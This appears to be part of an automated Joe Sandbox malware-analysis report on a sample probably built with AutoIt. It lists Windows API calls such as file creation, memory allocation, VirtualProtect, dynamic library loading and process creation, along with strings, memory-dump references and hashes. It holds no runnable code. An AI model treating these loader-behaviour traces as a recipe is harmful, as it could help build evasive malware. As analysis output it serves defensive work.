                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 975902462-1005189915
                                      • Opcode ID: 24b51536be07406fe832f1b2b30246bce656d7d829a97fe9934dc9edfaee302d
                                      • Instruction ID: cc8700d5c8826271a28463271080ea3b78c7ac9e5666311dca1e63aa0d47bc6d
                                      • Opcode Fuzzy Hash: 24b51536be07406fe832f1b2b30246bce656d7d829a97fe9934dc9edfaee302d
                                      • Instruction Fuzzy Hash: 5921C4B5E65318AFDB00DFA5EC59BDDBBB4FB08701F00811AF511A62A0D7B14644EF91

                                      Control-flow Graph
                                      • Graph rendering not reproduced; basic blocks 1392b18-1392cd0, calling 1392a18, CreateFileW, VirtualAlloc, CreateFileW, ReadFile, WriteFile, CloseHandle, VirtualFree
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01392B5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                      • Instruction ID: 0fbcb47d5d6c47dc0259cd01a31d12feff8542376c25cfc2e29734d61fa0d754
                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                      • Instruction Fuzzy Hash: EA512875A50249FBEF20DFE4CC49FDF77B8AF48705F108954F60AEA280DA7496408B60

                                      Control-flow Graph
                                      • Graph rendering not reproduced; single basic block 882c63-882cd3, calling CreateWindowExW * 2, ShowWindow * 2
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00882C91
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00882CB2
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00881CAD,?), ref: 00882CC6
                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00881CAD,?), ref: 00882CCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: 1003a25a081451e6539d06d4bc934639b9ce5211156f9066a485d26bf196fa29
                                      • Instruction ID: cf46db15b523e638dfb985015c25a4aa9f62fc3352821d3ef64daaec5f796173
                                      • Opcode Fuzzy Hash: 1003a25a081451e6539d06d4bc934639b9ce5211156f9066a485d26bf196fa29
                                      • Instruction Fuzzy Hash: 87F03AB56A53947AEB300713AC18FB72EBDD7C6F61F01401AF900A21B0C2710840EBB0

                                      Control-flow Graph
                                      • Graph rendering not reproduced; basic blocks 9e1740-9e191a, calling LoadLibraryA, GetProcAddress, ExitProcess, VirtualProtect * 2
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 009E187A
                                      • GetProcAddress.KERNEL32(?,009DAFF9), ref: 009E1898
                                      • ExitProcess.KERNEL32(?,009DAFF9), ref: 009E18A9
                                      • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 009E18F7
                                      • VirtualProtect.KERNELBASE(00880000,00001000), ref: 009E190C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                      • String ID:
                                      • API String ID: 1996367037-0
                                      • Opcode ID: 5a8d042e5e27860157fadb7ea2481988c52a49fe851f5a1a2fd010086ffc2805
                                      • Instruction ID: b99e836c935a0ce724d73ec076a68ebc622bb74e59af9a1d3ef12bc606f13e4e
                                      • Opcode Fuzzy Hash: 5a8d042e5e27860157fadb7ea2481988c52a49fe851f5a1a2fd010086ffc2805
                                      • Instruction Fuzzy Hash: 6E5127B2A543D24BD7229EB9DCC06B0B798EB5172072C0B39D9E6C73C6E7B45C098760

                                      Control-flow Graph
                                      • Graph rendering not reproduced; basic blocks 13945d8-13947dc, calling 13921f8, 13944c8, CreateFileW, VirtualAlloc, ReadFile, 1393268, 1394508, 13934c8, 1394558
                                      APIs
                                        • Part of subcall function 013944C8: Sleep.KERNELBASE(000001F4), ref: 013944D9
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013946F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: TOC09AQDNAC9D9WL
                                      • API String ID: 2694422964-1361438446
                                      • Opcode ID: d39d8dc12139e5fa335de783a3c339fa066d5a891c35989cd7decd9d29a71087
                                      • Instruction ID: 531c4be8d7f617056bcf6b6aaa18b462d8e8527ed97d152227e737878081788a
                                      • Opcode Fuzzy Hash: d39d8dc12139e5fa335de783a3c339fa066d5a891c35989cd7decd9d29a71087
                                      • Instruction Fuzzy Hash: 1D518E71D1424DEBEF11DBE8C814BEEBB79AF15304F004199E618BB2C0D6B91B49CBA5

                                      Control-flow Graph
                                      • Graph rendering not reproduced; basic blocks 883b1c-883b9b, calling RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B40
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B61
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00883B0F,SwapMouseButtons,00000004,?), ref: 00883B83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 7474fa0dcbb12aa6cce67d9f7524ede0d804ccac604ec1ffb3d6b0bd3193b6b8
                                      • Instruction ID: e032a7eb7584eac7938e95a5ec572ad06d466b03e25b951d9781c21c97db7dc1
                                      • Opcode Fuzzy Hash: 7474fa0dcbb12aa6cce67d9f7524ede0d804ccac604ec1ffb3d6b0bd3193b6b8
                                      • Instruction Fuzzy Hash: AB112AB5620208FFDB20DFA5DC44AEEB7B8FF05B94B108459A805D7110E2319F40A760
                                      Strings
                                      • Variable must be of type 'Object'., xrefs: 008D32B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Variable must be of type 'Object'.
                                      • API String ID: 0-109567571
                                      • Opcode ID: e221aaf250a6dc2f7173ecbf6a447b84840a08ad2766333107caa7c792489ffb
                                      • Instruction ID: 444ff8a86c3d8e396e397e8a940cc4ce051a8fb51b6c480d42edea31f7cc2746
                                      • Opcode Fuzzy Hash: e221aaf250a6dc2f7173ecbf6a447b84840a08ad2766333107caa7c792489ffb
                                      • Instruction Fuzzy Hash: 75C2AD71A00219CFCB24EF58C880AADB7B1FF19314F24856AE956EB391D375ED41CB92

                                      Control-flow Graph
                                      • Graph rendering not reproduced; basic blocks 883923-883a17 and 8c3393-8c3409, calling 886270, 886b57, LoadStringW, 88a8c7, 886350, 883fcf, 8a2340, 883a18, 8a4983, Shell_NotifyIconW, 88988f, 8833c6
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008C33A2
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00883A04
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_wcslen
                                      • String ID: Line:
                                      • API String ID: 2289894680-1585850449
                                      • Opcode ID: 2e98fd30f6424de6fe576adb7b16aebd048d2e03ebe28b9fc99318cb93de78e5
                                      • Instruction ID: 92dda882688d04adc7145cbff82025f1e33aedf60e303c42edd4478c303ad8b7
                                      • Opcode Fuzzy Hash: 2e98fd30f6424de6fe576adb7b16aebd048d2e03ebe28b9fc99318cb93de78e5
                                      • Instruction Fuzzy Hash: 3231CE71518304AAD725FB28EC45BEBB7E8FB81B14F00492AF599D2191EB709A49C7C3
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008A0668
                                        • Part of subcall function 008A32A4: RaiseException.KERNEL32(?,?,?,008A068A,?,00951444,?,?,?,?,?,?,008A068A,00881129,00948738,00881129), ref: 008A3304
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008A0685
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: e6f6a231cfc02e226eda68fb7328e1d0e8fdee050910e16b0beb10a7063a494f
                                      • Instruction ID: 00b63258e11765e73b51b0fc0949697ae677703169afc284603087a7fd438027
                                      • Opcode Fuzzy Hash: e6f6a231cfc02e226eda68fb7328e1d0e8fdee050910e16b0beb10a7063a494f
                                      • Instruction Fuzzy Hash: 11F0FF3490030C639F04B6A8D846D9E776CFE42358B604030B914D2C92EF70EA25CA82
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0139323D
                                      • ExitProcess.KERNEL32(00000000), ref: 0139325C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CreateExit
                                      • String ID: D
                                      • API String ID: 126409537-2746444292
                                      • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                      • Instruction ID: fcc97e486e4f18f9854ccbd8c60a7ad6742f8c71bd19fedc6a8518ba3d75e2a5
                                      • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                      • Instruction Fuzzy Hash: 0DF0ECB554024CABDF60EFE4CD49FEE777CBF44705F408508FA5A9A180DA7496088B61
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009082F5
                                      • TerminateProcess.KERNEL32(00000000), ref: 009082FC
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 009084DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFreeLibraryTerminate
                                      • String ID:
                                      • API String ID: 146820519-0
                                      • Opcode ID: 18b21e3b1bc3588f2fe2e873bbebeea4225aff7befd7e871725d09272bcc9b0b
                                      • Instruction ID: 7d53f9d03bf70cc0e4dbbb3a144b7195219e67d0976ccda763b6ce5a0fe1088f
                                      • Opcode Fuzzy Hash: 18b21e3b1bc3588f2fe2e873bbebeea4225aff7befd7e871725d09272bcc9b0b
                                      • Instruction Fuzzy Hash: 61127B71A083019FC714DF28C484B6ABBE5FF89318F04895DE9998B392DB31E945CF92
                                      APIs
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00881BF4
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00881BFC
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00881C07
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00881C12
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00881C1A
                                        • Part of subcall function 00881BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00881C22
                                        • Part of subcall function 00881B4A: RegisterClipboardFormatW.USER32(00000004), ref: 00881BA2
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088136A
                                      • OleInitialize.OLE32 ref: 00881388
                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 008C24AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                      • String ID:
                                      • API String ID: 3094916012-0
                                      • Opcode ID: 5e4ae7d4d95d3f0b21368930a6211b338bbd8f27b72dc0d0e1bb798baf5603f4
                                      • Instruction ID: 642e690e563de54df476ee924941194e091bdb2244f2cfd8e9fe0c508a431f78
                                      • Opcode Fuzzy Hash: 5e4ae7d4d95d3f0b21368930a6211b338bbd8f27b72dc0d0e1bb798baf5603f4
                                      • Instruction Fuzzy Hash: A571BCB49293008FC798EF7FA9457953AE4FB88346754862AE51AC7371FB304846EF41
                                      APIs
                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,008B85CC,?,00948CC8,0000000C), ref: 008B8704
                                      • GetLastError.KERNEL32(?,008B85CC,?,00948CC8,0000000C), ref: 008B870E
                                      • __dosmaperr.LIBCMT ref: 008B8739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast__dosmaperr
                                      • String ID:
                                      • API String ID: 2583163307-0
                                      • Opcode ID: 28732caee981ebeb5f82ee2e128be70c6fb5a9fbf2a919c22b21cda821d7567b
                                      • Instruction ID: 9e5f18822a16487e500430168606a4d7d75d0871dd8f01446107c857cd40b58c
                                      • Opcode Fuzzy Hash: 28732caee981ebeb5f82ee2e128be70c6fb5a9fbf2a919c22b21cda821d7567b
                                      • Instruction Fuzzy Hash: C2016B32608320A6D6647238A8497FF2B8DEBA7778F380119F814CB3D2DEA08C85C251
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 008917F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: CALL
                                      • API String ID: 1385522511-4196123274
                                      • Opcode ID: b37f7655e518c1be607a2ba6685ef6417d6ffdedaed3a0cc10520aaedc743dc5
                                      • Instruction ID: 40e4c69cba103cda3eb385e9cb3f19c4fa41de59f501a4ce849a64aa3ae558a4
                                      • Opcode Fuzzy Hash: b37f7655e518c1be607a2ba6685ef6417d6ffdedaed3a0cc10520aaedc743dc5
                                      • Instruction Fuzzy Hash: EB226B706082069FCB14EF18C484A2ABBF1FF89314F19896DF596CB362D771E855CB92
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00883908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 90fc3ce290c9181520ecabc3d572fab5f2fc389ae8160b6a80a1a2ffcfc4081f
                                      • Instruction ID: 6e8029acc99a5bbb99572c46208b2e1ba60b519bed98c81775a341dc8674d44c
                                      • Opcode Fuzzy Hash: 90fc3ce290c9181520ecabc3d572fab5f2fc389ae8160b6a80a1a2ffcfc4081f
                                      • Instruction Fuzzy Hash: C03191B06083019FD720EF25D894797BBE8FB49709F00092EF99AD3250E771AA44DB52
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 00885773
                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0088949C,?,00008000), ref: 008C4052
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ec3261a21ee289e81ce7cfa2d6efcd386468db97cb5f7d10a27cce7d3b042967
                                      • Instruction ID: 1bdf03ecd63117189d0188213dc47fee14b5b8e174fbb01890a2f467752b3ff7
                                      • Opcode Fuzzy Hash: ec3261a21ee289e81ce7cfa2d6efcd386468db97cb5f7d10a27cce7d3b042967
                                      • Instruction Fuzzy Hash: F0015631285625B6E7706A2ADC0EFA77F94EF02B74F14C314BA5C9A1E0C7B45854DB90
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 0088BB4E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID:
                                      • API String ID: 1385522511-0
                                      • Opcode ID: 4fd6277dad6d989979290fff0022474c865bdcac6c9be14031f22b349145f34d
                                      • Instruction ID: 695bcf2a8a91683625b1a712cba9aae81ddd07dbc0605c5991a04e780a98281e
                                      • Opcode Fuzzy Hash: 4fd6277dad6d989979290fff0022474c865bdcac6c9be14031f22b349145f34d
                                      • Instruction Fuzzy Hash: 3C32AA30A042099FDB24EF58C894BBEB7B9FF85354F18806AE905EB361D774AD41CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                       • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
